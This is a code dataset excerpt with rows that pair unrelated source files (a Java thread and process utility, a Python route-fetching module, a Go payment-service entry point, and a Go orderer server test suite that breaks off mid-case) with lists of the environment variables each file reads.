* @return the newly created thread
* @see java.lang.Thread
*/
public static SmartThread asyncLoop(final Callable afn,
boolean isDaemon, final Thread.UncaughtExceptionHandler eh,
int priority, final boolean isFactory, boolean startImmediately,
String threadName) {
SmartThread thread = new SmartThread(new Runnable() {
public void run() {
Object s;
try {
Callable fn = isFactory ? (Callable) afn.call() : afn;
while ((s = fn.call()) instanceof Long) {
Time.sleepSecs((Long) s);
}
} catch (Throwable t) {
if (Utils.exceptionCauseIsInstanceOf(
InterruptedException.class, t)) {
LOG.info("Async loop interrupted!");
return;
}
LOG.error("Async loop died!", t);
throw new RuntimeException(t);
}
}
});
if (eh != null) {
thread.setUncaughtExceptionHandler(eh);
} else {
thread.setUncaughtExceptionHandler(new Thread.UncaughtExceptionHandler() {
public void uncaughtException(Thread t, Throwable e) {
LOG.error("Async loop died!", e);
Utils.exitProcess(1, "Async loop died!");
}
});
}
thread.setDaemon(isDaemon);
thread.setPriority(priority);
if (threadName != null && !threadName.isEmpty()) {
thread.setName(thread.getName() +"-"+ threadName);
}
if (startImmediately) {
thread.start();
}
return thread;
}
/**
* Convenience method used when only the function and name suffix are given.
* @param afn the code to call on each iteration
* @param threadName a suffix to be appended to the thread name
* @return the newly created thread
* @see java.lang.Thread
*/
public static SmartThread asyncLoop(final Callable afn, String threadName, final Thread.UncaughtExceptionHandler eh) {
return asyncLoop(afn, false, eh, Thread.NORM_PRIORITY, false, true,
threadName);
}
/**
* Convenience method used when only the function is given.
* @param afn the code to call on each iteration
* @return the newly created thread
*/
public static SmartThread asyncLoop(final Callable afn) {
return asyncLoop(afn, false, null, Thread.NORM_PRIORITY, false, true,
null);
}
/**
* A callback that can accept an integer.
* @param <V> the result type of method <code>call</code>
*/
public interface ExitCodeCallable<V> extends Callable<V> {
V call(int exitCode);
}
/**
* Launch a new process as per {@link java.lang.ProcessBuilder} with a given
* callback.
* @param command the command to be executed in the new process
* @param environment the environment to be applied to the process. Can be
* null.
* @param logPrefix a prefix for log entries from the output of the process.
* Can be null.
* @param exitCodeCallback code to be called passing the exit code value
* when the process completes
* @param dir the working directory of the new process
* @return the new process
* @throws IOException
* @see java.lang.ProcessBuilder
*/
public static Process launchProcess(List<String> command,
Map<String,String> environment,
final String logPrefix,
final ExitCodeCallable exitCodeCallback,
File dir)
throws IOException {
return _instance.launchProcessImpl(command, environment, logPrefix,
exitCodeCallback, dir);
}
public Process launchProcessImpl(
List<String> command,
Map<String,String> cmdEnv,
final String logPrefix,
final ExitCodeCallable exitCodeCallback,
File dir)
throws IOException {
ProcessBuilder builder = new ProcessBuilder(command);
Map<String,String> procEnv = builder.environment();
if (dir != null) {
builder.directory(dir);
}
builder.redirectErrorStream(true);
if (cmdEnv != null) {
procEnv.putAll(cmdEnv);
}
final Process process = builder.start();
if (logPrefix != null || exitCodeCallback != null) {
Utils.asyncLoop(new Callable() {
public Object call() {
if (logPrefix != null ) {
Utils.readAndLogStream(logPrefix,
process.getInputStream());
}
if (exitCodeCallback != null) {
try {
process.waitFor();
} catch (InterruptedException ie) {
LOG.info("{} interrupted", logPrefix);
exitCodeCallback.call(process.exitValue());
}
}
return null; // Run only once.
}
});
}
return process;
}
public static <T> List<T> interleaveAll(List<List<T>> nodeList) {
if (nodeList != null && nodeList.size() > 0) {
List<T> first = new ArrayList<T>();
List<List<T>> rest = new ArrayList<List<T>>();
for (List<T> node : nodeList) {
if (node != null && node.size() > 0) {
first.add(node.get(0));
rest.add(node.subList(1, node.size()));
}
}
List<T> interleaveRest = interleaveAll(rest);
if (interleaveRest != null) {
first.addAll(interleaveRest);
}
return first;
}
return null;
}
public static long bitXor(Long a, Long b) {
return a ^ b;
}
public static List<String> getRepeat(List<String> list) {
List<String> rtn = new ArrayList<String>();
Set<String> idSet = new HashSet<String>();
for (String id : list) {
if (idSet.contains(id)) {
rtn.add(id);
} else {
idSet.add(id);
}
}
return rtn;
}
}
| [
"\"OS\"",
"\"OS\"",
"\"OS\"",
"\"STORM_CONF_DIR\"",
"\"STORM_CONF_DIR\"",
"\"STORM_EXT_CLASSPATH\""
]
| []
| [
"STORM_EXT_CLASSPATH",
"STORM_CONF_DIR",
"OS"
]
| [] | ["STORM_EXT_CLASSPATH", "STORM_CONF_DIR", "OS"] | java | 3 | 0 | |
src/modules/lines.py | import datetime
import os
from typing import List
from models.line import Line
from modules.lines_data import update_line_data
from modules.lines_summary import fetch_lines_summary
from modules.logger import log, LogLevels
from modules.session_manager import SessionManager
def fetch_all_lines_list(session_manager: SessionManager) -> List:
"""
Retrieves a list with all the airplanes registered in the account (and their summarized data), saving the output
to a CSV file.
:param session_manager:
:return:
"""
log("Entering fetch_all_lines_list method", LogLevels.LOG_LEVEL_DEBUG)
lines_summary = fetch_lines_summary(session_manager=session_manager)
lines = [create_line_object(line_id=line['id'], session_manager=session_manager) for line in lines_summary]
lines_objects_folder = os.getenv('LINES_OBJECTS_FOLDER', '/data/models/lines')
log(f"Finished fetching {len(lines_summary)} lines! (objects saved to folder {lines_objects_folder})")
return lines
def create_line_object(line_id: int, session_manager: SessionManager) -> Line:
"""
Create the Line object and updates it with the given ID
:param session_manager:
:param line_id:
:return:
"""
log("Entering create_line_object method", LogLevels.LOG_LEVEL_DEBUG)
line = Line(id=line_id)
update_frequency_days = int(os.getenv('LINE_UPDATE_INTERVAL_DAYS', 2))
delta_days = (datetime.datetime.now() - line.last_updated_at).days if line.last_updated_at is not None else 0
if line.last_updated_at is not None and delta_days < update_frequency_days:
log(
"No need to update line {} (ID: {}) as only {} day(s) have passed since last update (expected {})".format(
line.name,
line.id,
delta_days,
update_frequency_days
),
LogLevels.LOG_LEVEL_NOTICE
)
return line
update_line_data(line=line, session_manager=session_manager)
return line
| []
| []
| [
"LINE_UPDATE_INTERVAL_DAYS",
"LINES_OBJECTS_FOLDER"
]
| [] | ["LINE_UPDATE_INTERVAL_DAYS", "LINES_OBJECTS_FOLDER"] | python | 2 | 0 | |
main.go | package main
import (
"log"
"net/http"
"os"
"github.com/braintree-go/braintree-go"
"github.com/mackstann/payment_user_svc_exercise/internal/braintree_gateway"
"github.com/mackstann/payment_user_svc_exercise/internal/routes"
"github.com/mackstann/payment_user_svc_exercise/internal/service"
"github.com/mackstann/payment_user_svc_exercise/internal/store"
"github.com/mackstann/payment_user_svc_exercise/internal/stripe_gateway"
)
const addr = "127.0.0.1:8000"
var braintreeEnv = braintree.Sandbox
func main() {
stripeKey := os.Getenv("STRIPE_KEY")
if stripeKey == "" {
log.Fatal("Please set the STRIPE_KEY env var")
}
stripe := stripe_gateway.NewGateway(stripeKey)
braintreeMerchantID := os.Getenv("BRAINTREE_MERCHANT_ID")
braintreePublicKey := os.Getenv("BRAINTREE_PUBLIC_KEY")
braintreePrivateKey := os.Getenv("BRAINTREE_PRIVATE_KEY")
if braintreeMerchantID == "" {
log.Fatal("Please set the BRAINTREE_MERCHANT_ID env var")
}
if braintreePublicKey == "" {
log.Fatal("Please set the BRAINTREE_PUBLIC_KEY env var")
}
if braintreePrivateKey == "" {
log.Fatal("Please set the BRAINTREE_PRIVATE_KEY env var")
}
braintree := braintree_gateway.NewGateway(
braintreeEnv, braintreeMerchantID, braintreePublicKey, braintreePrivateKey)
store := store.NewStore()
svc := service.NewService(store, stripe, braintree)
r := routes.NewRouter(svc, addr)
srv := &http.Server{
Handler: r,
Addr: addr,
}
log.Fatal(srv.ListenAndServe())
}
| [
"\"STRIPE_KEY\"",
"\"BRAINTREE_MERCHANT_ID\"",
"\"BRAINTREE_PUBLIC_KEY\"",
"\"BRAINTREE_PRIVATE_KEY\""
]
| []
| [
"BRAINTREE_PUBLIC_KEY",
"BRAINTREE_PRIVATE_KEY",
"BRAINTREE_MERCHANT_ID",
"STRIPE_KEY"
]
| [] | ["BRAINTREE_PUBLIC_KEY", "BRAINTREE_PRIVATE_KEY", "BRAINTREE_MERCHANT_ID", "STRIPE_KEY"] | go | 4 | 0 | |
orderer/common/server/main_test.go | // Copyright IBM Corp. All Rights Reserved.
// SPDX-License-Identifier: Apache-2.0
package server
import (
"fmt"
"io/ioutil"
"net"
"net/http"
"os"
"os/exec"
"path/filepath"
"strconv"
"strings"
"testing"
"time"
"github.com/golang/protobuf/proto"
"github.com/hyperledger/fabric-protos-go/common"
"github.com/VoneChain-CS/fabric-gm/bccsp/factory"
"github.com/VoneChain-CS/fabric-gm/bccsp/sw"
"github.com/VoneChain-CS/fabric-gm/common/channelconfig"
"github.com/VoneChain-CS/fabric-gm/common/crypto/tlsgen"
deliver_mocks "github.com/VoneChain-CS/fabric-gm/common/deliver/mock"
"github.com/VoneChain-CS/fabric-gm/common/flogging"
"github.com/VoneChain-CS/fabric-gm/common/flogging/floggingtest"
"github.com/VoneChain-CS/fabric-gm/common/ledger/blockledger"
"github.com/VoneChain-CS/fabric-gm/common/ledger/blockledger/fileledger"
"github.com/VoneChain-CS/fabric-gm/common/metrics/disabled"
"github.com/VoneChain-CS/fabric-gm/common/metrics/prometheus"
"github.com/VoneChain-CS/fabric-gm/core/config/configtest"
"github.com/VoneChain-CS/fabric-gm/internal/configtxgen/encoder"
"github.com/VoneChain-CS/fabric-gm/internal/configtxgen/genesisconfig"
"github.com/VoneChain-CS/fabric-gm/internal/pkg/comm"
"github.com/VoneChain-CS/fabric-gm/internal/pkg/identity"
"github.com/VoneChain-CS/fabric-gm/orderer/common/bootstrap/file"
"github.com/VoneChain-CS/fabric-gm/orderer/common/cluster"
"github.com/VoneChain-CS/fabric-gm/orderer/common/localconfig"
"github.com/VoneChain-CS/fabric-gm/orderer/common/multichannel"
server_mocks "github.com/VoneChain-CS/fabric-gm/orderer/common/server/mocks"
"github.com/VoneChain-CS/fabric-gm/orderer/consensus"
"github.com/VoneChain-CS/fabric-gm/protoutil"
. "github.com/onsi/gomega"
"github.com/onsi/gomega/gexec"
"github.com/pkg/errors"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
"go.uber.org/zap"
"go.uber.org/zap/zapcore"
)
//go:generate counterfeiter -o mocks/signer_serializer.go --fake-name SignerSerializer . signerSerializer
type signerSerializer interface {
identity.SignerSerializer
}
func TestInitializeLogging(t *testing.T) {
origEnvValue := os.Getenv("FABRIC_LOGGING_SPEC")
os.Setenv("FABRIC_LOGGING_SPEC", "foo=debug")
initializeLogging()
assert.Equal(t, "debug", flogging.LoggerLevel("foo"))
os.Setenv("FABRIC_LOGGING_SPEC", origEnvValue)
}
func TestInitializeProfilingService(t *testing.T) {
origEnvValue := os.Getenv("FABRIC_LOGGING_SPEC")
defer os.Setenv("FABRIC_LOGGING_SPEC", origEnvValue)
os.Setenv("FABRIC_LOGGING_SPEC", "debug")
// get a free random port
listenAddr := func() string {
l, _ := net.Listen("tcp", "localhost:0")
l.Close()
return l.Addr().String()
}()
go initializeProfilingService(
&localconfig.TopLevel{
General: localconfig.General{
Profile: localconfig.Profile{
Enabled: true,
Address: listenAddr,
}},
Kafka: localconfig.Kafka{Verbose: true},
},
)
time.Sleep(500 * time.Millisecond)
if _, err := http.Get("http://" + listenAddr + "/" + "/debug/"); err != nil {
t.Logf("Expected pprof to be up (will retry again in 3 seconds): %s", err)
time.Sleep(3 * time.Second)
if _, err := http.Get("http://" + listenAddr + "/" + "/debug/"); err != nil {
t.Fatalf("Expected pprof to be up: %s", err)
}
}
}
func TestInitializeServerConfig(t *testing.T) {
conf := &localconfig.TopLevel{
General: localconfig.General{
ConnectionTimeout: 7 * time.Second,
TLS: localconfig.TLS{
Enabled: true,
ClientAuthRequired: true,
Certificate: "main.go",
PrivateKey: "main.go",
RootCAs: []string{"main.go"},
ClientRootCAs: []string{"main.go"},
},
},
}
sc := initializeServerConfig(conf, nil)
expectedContent, _ := ioutil.ReadFile("main.go")
assert.Equal(t, expectedContent, sc.SecOpts.Certificate)
assert.Equal(t, expectedContent, sc.SecOpts.Key)
assert.Equal(t, [][]byte{expectedContent}, sc.SecOpts.ServerRootCAs)
assert.Equal(t, [][]byte{expectedContent}, sc.SecOpts.ClientRootCAs)
sc = initializeServerConfig(conf, nil)
defaultOpts := comm.DefaultKeepaliveOptions
assert.Equal(t, defaultOpts.ServerMinInterval, sc.KaOpts.ServerMinInterval)
assert.Equal(t, time.Duration(0), sc.KaOpts.ServerInterval)
assert.Equal(t, time.Duration(0), sc.KaOpts.ServerTimeout)
assert.Equal(t, 7*time.Second, sc.ConnectionTimeout)
testDuration := 10 * time.Second
conf.General.Keepalive = localconfig.Keepalive{
ServerMinInterval: testDuration,
ServerInterval: testDuration,
ServerTimeout: testDuration,
}
sc = initializeServerConfig(conf, nil)
assert.Equal(t, testDuration, sc.KaOpts.ServerMinInterval)
assert.Equal(t, testDuration, sc.KaOpts.ServerInterval)
assert.Equal(t, testDuration, sc.KaOpts.ServerTimeout)
sc = initializeServerConfig(conf, nil)
assert.NotNil(t, sc.Logger)
assert.Equal(t, comm.NewServerStatsHandler(&disabled.Provider{}), sc.ServerStatsHandler)
assert.Len(t, sc.UnaryInterceptors, 2)
assert.Len(t, sc.StreamInterceptors, 2)
sc = initializeServerConfig(conf, &prometheus.Provider{})
assert.NotNil(t, sc.ServerStatsHandler)
goodFile := "main.go"
badFile := "does_not_exist"
oldLogger := logger
defer func() { logger = oldLogger }()
logger, _ = floggingtest.NewTestLogger(t)
testCases := []struct {
name string
certificate string
privateKey string
rootCA string
clientRootCert string
clusterCert string
clusterKey string
clusterCA string
}{
{"BadCertificate", badFile, goodFile, goodFile, goodFile, "", "", ""},
{"BadPrivateKey", goodFile, badFile, goodFile, goodFile, "", "", ""},
{"BadRootCA", goodFile, goodFile, badFile, goodFile, "", "", ""},
{"BadClientRootCertificate", goodFile, goodFile, goodFile, badFile, "", "", ""},
{"ClusterBadCertificate", goodFile, goodFile, goodFile, goodFile, badFile, goodFile, goodFile},
{"ClusterBadPrivateKey", goodFile, goodFile, goodFile, goodFile, goodFile, badFile, goodFile},
{"ClusterBadRootCA", goodFile, goodFile, goodFile, goodFile, goodFile, goodFile, badFile},
}
for _, tc := range testCases {
t.Run(tc.name, func(t *testing.T) {
conf := &localconfig.TopLevel{
General: localconfig.General{
TLS: localconfig.TLS{
Enabled: true,
ClientAuthRequired: true,
Certificate: tc.certificate,
PrivateKey: tc.privateKey,
RootCAs: []string{tc.rootCA},
ClientRootCAs: []string{tc.clientRootCert},
},
Cluster: localconfig.Cluster{
ClientCertificate: tc.clusterCert,
ClientPrivateKey: tc.clusterKey,
RootCAs: []string{tc.clusterCA},
},
},
}
assert.Panics(t, func() {
if tc.clusterCert == "" {
initializeServerConfig(conf, nil)
} else {
initializeClusterClientConfig(conf)
}
},
)
})
}
}
func TestInitializeBootstrapChannel(t *testing.T) {
cleanup := configtest.SetDevFabricConfigPath(t)
defer cleanup()
genesisFile := produceGenesisFile(t, genesisconfig.SampleSingleMSPSoloProfile, "testchannelid")
defer os.Remove(genesisFile)
fileLedgerLocation, _ := ioutil.TempDir("", "main_test-")
defer os.RemoveAll(fileLedgerLocation)
ledgerFactory, _, err := createLedgerFactory(
&localconfig.TopLevel{
FileLedger: localconfig.FileLedger{
Location: fileLedgerLocation,
},
},
&disabled.Provider{},
)
assert.NoError(t, err)
bootstrapConfig := &localconfig.TopLevel{
General: localconfig.General{
BootstrapMethod: "file",
BootstrapFile: genesisFile,
},
}
bootstrapBlock := extractBootstrapBlock(bootstrapConfig)
initializeBootstrapChannel(bootstrapBlock, ledgerFactory)
ledger, err := ledgerFactory.GetOrCreate("testchannelid")
assert.NoError(t, err)
assert.Equal(t, uint64(1), ledger.Height())
}
func TestExtractBootstrapBlock(t *testing.T) {
cleanup := configtest.SetDevFabricConfigPath(t)
defer cleanup()
genesisFile := produceGenesisFile(t, genesisconfig.SampleSingleMSPSoloProfile, "testchannelid")
defer os.Remove(genesisFile)
tests := []struct {
config *localconfig.TopLevel
block *common.Block
}{
{
config: &localconfig.TopLevel{
General: localconfig.General{BootstrapMethod: "file", BootstrapFile: genesisFile},
},
block: file.New(genesisFile).GenesisBlock(),
},
{
config: &localconfig.TopLevel{
General: localconfig.General{BootstrapMethod: "none"},
},
block: nil,
},
}
for _, tt := range tests {
b := extractBootstrapBlock(tt.config)
assert.Truef(t, proto.Equal(tt.block, b), "wanted %v, got %v", tt.block, b)
}
}
func TestExtractSysChanLastConfig(t *testing.T) {
tmpdir, err := ioutil.TempDir("", "main_test-")
require.NoError(t, err)
defer os.RemoveAll(tmpdir)
rlf, err := fileledger.New(tmpdir, &disabled.Provider{})
require.NoError(t, err)
conf := genesisconfig.Load(genesisconfig.SampleInsecureSoloProfile, configtest.GetDevConfigDir())
genesisBlock := encoder.New(conf).GenesisBlock()
lastConf := extractSysChanLastConfig(rlf, genesisBlock)
assert.Nil(t, lastConf)
rl, err := rlf.GetOrCreate("testchannelid")
require.NoError(t, err)
err = rl.Append(genesisBlock)
require.NoError(t, err)
lastConf = extractSysChanLastConfig(rlf, genesisBlock)
assert.NotNil(t, lastConf)
assert.Equal(t, uint64(0), lastConf.Header.Number)
assert.Panics(t, func() {
_ = extractSysChanLastConfig(rlf, nil)
})
configTx, err := protoutil.CreateSignedEnvelope(common.HeaderType_CONFIG, "testchannelid", nil, &common.ConfigEnvelope{}, 0, 0)
require.NoError(t, err)
nextBlock := blockledger.CreateNextBlock(rl, []*common.Envelope{configTx})
nextBlock.Metadata.Metadata[common.BlockMetadataIndex_SIGNATURES] = protoutil.MarshalOrPanic(&common.Metadata{
Value: protoutil.MarshalOrPanic(&common.OrdererBlockMetadata{
LastConfig: &common.LastConfig{Index: rl.Height()},
}),
})
nextBlock.Metadata.Metadata[common.BlockMetadataIndex_LAST_CONFIG] = protoutil.MarshalOrPanic(&common.Metadata{
Value: protoutil.MarshalOrPanic(&common.LastConfig{Index: rl.Height()}),
})
err = rl.Append(nextBlock)
require.NoError(t, err)
lastConf = extractSysChanLastConfig(rlf, genesisBlock)
assert.NotNil(t, lastConf)
assert.Equal(t, uint64(1), lastConf.Header.Number)
}
func TestSelectClusterBootBlock(t *testing.T) {
bootstrapBlock := &common.Block{Header: &common.BlockHeader{Number: 100}}
lastConfBlock := &common.Block{Header: &common.BlockHeader{Number: 100}}
clusterBoot := selectClusterBootBlock(bootstrapBlock, nil)
assert.NotNil(t, clusterBoot)
assert.Equal(t, uint64(100), clusterBoot.Header.Number)
assert.True(t, bootstrapBlock == clusterBoot)
clusterBoot = selectClusterBootBlock(bootstrapBlock, lastConfBlock)
assert.NotNil(t, clusterBoot)
assert.Equal(t, uint64(100), clusterBoot.Header.Number)
assert.True(t, bootstrapBlock == clusterBoot)
lastConfBlock.Header.Number = 200
clusterBoot = selectClusterBootBlock(bootstrapBlock, lastConfBlock)
assert.NotNil(t, clusterBoot)
assert.Equal(t, uint64(200), clusterBoot.Header.Number)
assert.True(t, lastConfBlock == clusterBoot)
bootstrapBlock.Header.Number = 300
clusterBoot = selectClusterBootBlock(bootstrapBlock, lastConfBlock)
assert.NotNil(t, clusterBoot)
assert.Equal(t, uint64(300), clusterBoot.Header.Number)
assert.True(t, bootstrapBlock == clusterBoot)
}
func TestLoadLocalMSP(t *testing.T) {
t.Run("Happy", func(t *testing.T) {
localMSPDir := configtest.GetDevMspDir()
localMSP := loadLocalMSP(
&localconfig.TopLevel{
General: localconfig.General{
LocalMSPDir: localMSPDir,
LocalMSPID: "SampleOrg",
BCCSP: &factory.FactoryOpts{
ProviderName: "GM",
SwOpts: &factory.SwOpts{
HashFamily: "GMSM3",
SecLevel: 256,
Ephemeral: true,
},
},
},
},
)
require.NotNil(t, localMSP)
id, err := localMSP.GetIdentifier()
require.NoError(t, err)
require.Equal(t, id, "SampleOrg")
})
t.Run("Error", func(t *testing.T) {
oldLogger := logger
defer func() { logger = oldLogger }()
logger, _ = floggingtest.NewTestLogger(t)
assert.Panics(t, func() {
loadLocalMSP(
&localconfig.TopLevel{
General: localconfig.General{
LocalMSPDir: "",
LocalMSPID: "",
},
},
)
})
})
}
func TestInitializeMultichannelRegistrar(t *testing.T) {
cleanup := configtest.SetDevFabricConfigPath(t)
defer cleanup()
genesisFile := produceGenesisFile(t, genesisconfig.SampleDevModeSoloProfile, "testchannelid")
defer os.Remove(genesisFile)
conf := genesisConfig(t, genesisFile)
cryptoProvider, err := sw.NewDefaultSecurityLevelWithKeystore(sw.NewDummyKeyStore())
assert.NoError(t, err)
signer := &server_mocks.SignerSerializer{}
t.Run("registrar with a system channel", func(t *testing.T) {
lf, _, err := createLedgerFactory(conf, &disabled.Provider{})
assert.NoError(t, err)
bootBlock := file.New(genesisFile).GenesisBlock()
initializeBootstrapChannel(bootBlock, lf)
registrar := initializeMultichannelRegistrar(
bootBlock,
&replicationInitiator{cryptoProvider: cryptoProvider},
&cluster.PredicateDialer{},
comm.ServerConfig{},
nil,
conf,
signer,
&disabled.Provider{},
&server_mocks.HealthChecker{},
lf,
cryptoProvider,
)
assert.NotNil(t, registrar)
assert.Equal(t, "testchannelid", registrar.SystemChannelID())
})
t.Run("registrar without a system channel", func(t *testing.T) {
conf.General.BootstrapMethod = "none"
conf.General.GenesisFile = ""
lf, _, err := createLedgerFactory(conf, &disabled.Provider{})
assert.NoError(t, err)
registrar := initializeMultichannelRegistrar(
nil,
&replicationInitiator{cryptoProvider: cryptoProvider},
&cluster.PredicateDialer{},
comm.ServerConfig{},
nil,
conf,
signer,
&disabled.Provider{},
&server_mocks.HealthChecker{},
lf,
cryptoProvider,
)
assert.NotNil(t, registrar)
assert.Empty(t, registrar.SystemChannelID())
})
}
func TestInitializeGrpcServer(t *testing.T) {
// get a free random port
listenAddr := func() string {
l, _ := net.Listen("tcp", "localhost:0")
l.Close()
return l.Addr().String()
}()
host := strings.Split(listenAddr, ":")[0]
port, _ := strconv.ParseUint(strings.Split(listenAddr, ":")[1], 10, 16)
conf := &localconfig.TopLevel{
General: localconfig.General{
ListenAddress: host,
ListenPort: uint16(port),
TLS: localconfig.TLS{
Enabled: false,
ClientAuthRequired: false,
},
},
}
assert.NotPanics(t, func() {
grpcServer := initializeGrpcServer(conf, initializeServerConfig(conf, nil))
grpcServer.Listener().Close()
})
}
// generateCryptoMaterials uses cryptogen to generate the necessary
// MSP files and TLS certificates
func generateCryptoMaterials(t *testing.T, cryptogen string) string {
gt := NewGomegaWithT(t)
cryptoPath := filepath.Join(tempDir, "crypto")
cmd := exec.Command(
cryptogen,
"generate",
"--config", filepath.Join(tempDir, "examplecom-config.yaml"),
"--output", cryptoPath,
)
cryptogenProcess, err := gexec.Start(cmd, nil, nil)
gt.Expect(err).NotTo(HaveOccurred())
gt.Eventually(cryptogenProcess, time.Minute).Should(gexec.Exit(0))
return cryptoPath
}
func TestUpdateTrustedRoots(t *testing.T) {
cleanup := configtest.SetDevFabricConfigPath(t)
defer cleanup()
genesisFile := produceGenesisFile(t, genesisconfig.SampleDevModeSoloProfile, "testchannelid")
defer os.Remove(genesisFile)
cryptoPath := generateCryptoMaterials(t, cryptogen)
defer os.RemoveAll(cryptoPath)
// get a free random port
listenAddr := func() string {
l, _ := net.Listen("tcp", "localhost:0")
l.Close()
return l.Addr().String()
}()
port, _ := strconv.ParseUint(strings.Split(listenAddr, ":")[1], 10, 16)
conf := &localconfig.TopLevel{
General: localconfig.General{
BootstrapMethod: "file",
BootstrapFile: genesisFile,
ListenAddress: "localhost",
ListenPort: uint16(port),
TLS: localconfig.TLS{
Enabled: false,
ClientAuthRequired: false,
},
},
}
grpcServer := initializeGrpcServer(conf, initializeServerConfig(conf, nil))
caMgr := &caManager{
appRootCAsByChain: make(map[string][][]byte),
ordererRootCAsByChain: make(map[string][][]byte),
}
callback := func(bundle *channelconfig.Bundle) {
if grpcServer.MutualTLSRequired() {
t.Log("callback called")
caMgr.updateTrustedRoots(bundle, grpcServer)
}
}
lf, _, err := createLedgerFactory(conf, &disabled.Provider{})
assert.NoError(t, err)
bootBlock := file.New(genesisFile).GenesisBlock()
initializeBootstrapChannel(bootBlock, lf)
signer := &server_mocks.SignerSerializer{}
cryptoProvider, err := sw.NewDefaultSecurityLevelWithKeystore(sw.NewDummyKeyStore())
assert.NoError(t, err)
initializeMultichannelRegistrar(
bootBlock,
&replicationInitiator{cryptoProvider: cryptoProvider},
&cluster.PredicateDialer{},
comm.ServerConfig{},
nil,
genesisConfig(t, genesisFile),
signer,
&disabled.Provider{},
&server_mocks.HealthChecker{},
lf,
cryptoProvider,
callback,
)
t.Logf("# app CAs: %d", len(caMgr.appRootCAsByChain["testchannelid"]))
t.Logf("# orderer CAs: %d", len(caMgr.ordererRootCAsByChain["testchannelid"]))
// mutual TLS not required so no updates should have occurred
assert.Equal(t, 0, len(caMgr.appRootCAsByChain["testchannelid"]))
assert.Equal(t, 0, len(caMgr.ordererRootCAsByChain["testchannelid"]))
grpcServer.Listener().Close()
conf = &localconfig.TopLevel{
General: localconfig.General{
ListenAddress: "localhost",
ListenPort: uint16(port),
TLS: localconfig.TLS{
Enabled: true,
ClientAuthRequired: true,
PrivateKey: filepath.Join(cryptoPath, "ordererOrganizations", "example.com", "orderers", "127.0.0.1.example.com", "tls", "server.key"),
Certificate: filepath.Join(cryptoPath, "ordererOrganizations", "example.com", "orderers", "127.0.0.1.example.com", "tls", "server.crt"),
},
},
}
grpcServer = initializeGrpcServer(conf, initializeServerConfig(conf, nil))
caMgr = &caManager{
appRootCAsByChain: make(map[string][][]byte),
ordererRootCAsByChain: make(map[string][][]byte),
}
clusterConf := initializeClusterClientConfig(conf)
predDialer := &cluster.PredicateDialer{
Config: clusterConf,
}
callback = func(bundle *channelconfig.Bundle) {
if grpcServer.MutualTLSRequired() {
t.Log("callback called")
caMgr.updateTrustedRoots(bundle, grpcServer)
caMgr.updateClusterDialer(predDialer, clusterConf.SecOpts.ServerRootCAs)
}
}
initializeMultichannelRegistrar(
bootBlock,
&replicationInitiator{cryptoProvider: cryptoProvider},
predDialer,
comm.ServerConfig{},
nil,
genesisConfig(t, genesisFile),
signer,
&disabled.Provider{},
&server_mocks.HealthChecker{},
lf,
cryptoProvider,
callback,
)
t.Logf("# app CAs: %d", len(caMgr.appRootCAsByChain["testchannelid"]))
t.Logf("# orderer CAs: %d", len(caMgr.ordererRootCAsByChain["testchannelid"]))
// mutual TLS is required so updates should have occurred
// we expect an intermediate and root CA for apps and orderers
assert.Equal(t, 2, len(caMgr.appRootCAsByChain["testchannelid"]))
assert.Equal(t, 2, len(caMgr.ordererRootCAsByChain["testchannelid"]))
assert.Len(t, predDialer.Config.SecOpts.ServerRootCAs, 2)
grpcServer.Listener().Close()
}
func TestConfigureClusterListener(t *testing.T) {
logEntries := make(chan string, 100)
allocatePort := func() uint16 {
l, err := net.Listen("tcp", "127.0.0.1:0")
assert.NoError(t, err)
_, portStr, err := net.SplitHostPort(l.Addr().String())
assert.NoError(t, err)
port, err := strconv.ParseInt(portStr, 10, 64)
assert.NoError(t, err)
assert.NoError(t, l.Close())
t.Log("picked unused port", port)
return uint16(port)
}
unUsedPort := allocatePort()
backupLogger := logger
logger = logger.WithOptions(zap.Hooks(func(entry zapcore.Entry) error {
logEntries <- entry.Message
return nil
}))
defer func() {
logger = backupLogger
}()
ca, err := tlsgen.NewCA()
assert.NoError(t, err)
serverKeyPair, err := ca.NewServerCertKeyPair("127.0.0.1")
assert.NoError(t, err)
loadPEM := func(fileName string) ([]byte, error) {
switch fileName {
case "cert":
return serverKeyPair.Cert, nil
case "key":
return serverKeyPair.Key, nil
case "ca":
return ca.CertBytes(), nil
default:
return nil, errors.New("I/O error")
}
}
for _, testCase := range []struct {
name string
conf *localconfig.TopLevel
generalConf comm.ServerConfig
generalSrv *comm.GRPCServer
shouldBeEqual bool
expectedPanic string
expectedLogEntries []string
}{
{
name: "invalid certificate",
generalConf: comm.ServerConfig{},
conf: &localconfig.TopLevel{
General: localconfig.General{
Cluster: localconfig.Cluster{
ListenAddress: "127.0.0.1",
ListenPort: 5000,
ServerPrivateKey: "key",
ServerCertificate: "bad",
RootCAs: []string{"ca"},
},
},
},
expectedPanic: "Failed to load cluster server certificate from 'bad' (I/O error)",
generalSrv: &comm.GRPCServer{},
expectedLogEntries: []string{"Failed to load cluster server certificate from 'bad' (I/O error)"},
},
{
name: "invalid key",
generalConf: comm.ServerConfig{},
conf: &localconfig.TopLevel{
General: localconfig.General{
Cluster: localconfig.Cluster{
ListenAddress: "127.0.0.1",
ListenPort: 5000,
ServerPrivateKey: "bad",
ServerCertificate: "cert",
RootCAs: []string{"ca"},
},
},
},
expectedPanic: "Failed to load cluster server key from 'bad' (I/O error)",
generalSrv: &comm.GRPCServer{},
expectedLogEntries: []string{"Failed to load cluster server key from 'bad' (I/O error)"},
},
{
name: "invalid ca cert",
generalConf: comm.ServerConfig{},
conf: &localconfig.TopLevel{
General: localconfig.General{
Cluster: localconfig.Cluster{
ListenAddress: "127.0.0.1",
ListenPort: 5000,
ServerPrivateKey: "key",
ServerCertificate: "cert",
RootCAs: []string{"bad"},
},
},
},
expectedPanic: "Failed to load CA cert file 'bad' (I/O error)",
generalSrv: &comm.GRPCServer{},
expectedLogEntries: []string{"Failed to load CA cert file 'bad' (I/O error)"},
},
{
name: "bad listen address",
generalConf: comm.ServerConfig{},
conf: &localconfig.TopLevel{
General: localconfig.General{
Cluster: localconfig.Cluster{
ListenAddress: "99.99.99.99",
ListenPort: unUsedPort,
ServerPrivateKey: "key",
ServerCertificate: "cert",
RootCAs: []string{"ca"},
},
},
},
expectedPanic: fmt.Sprintf("Failed creating gRPC server on 99.99.99.99:%d due "+
"to listen tcp 99.99.99.99:%d:", unUsedPort, unUsedPort),
generalSrv: &comm.GRPCServer{},
},
{
name: "green path",
generalConf: comm.ServerConfig{},
conf: &localconfig.TopLevel{
General: localconfig.General{
Cluster: localconfig.Cluster{
ListenAddress: "127.0.0.1",
ListenPort: 5000,
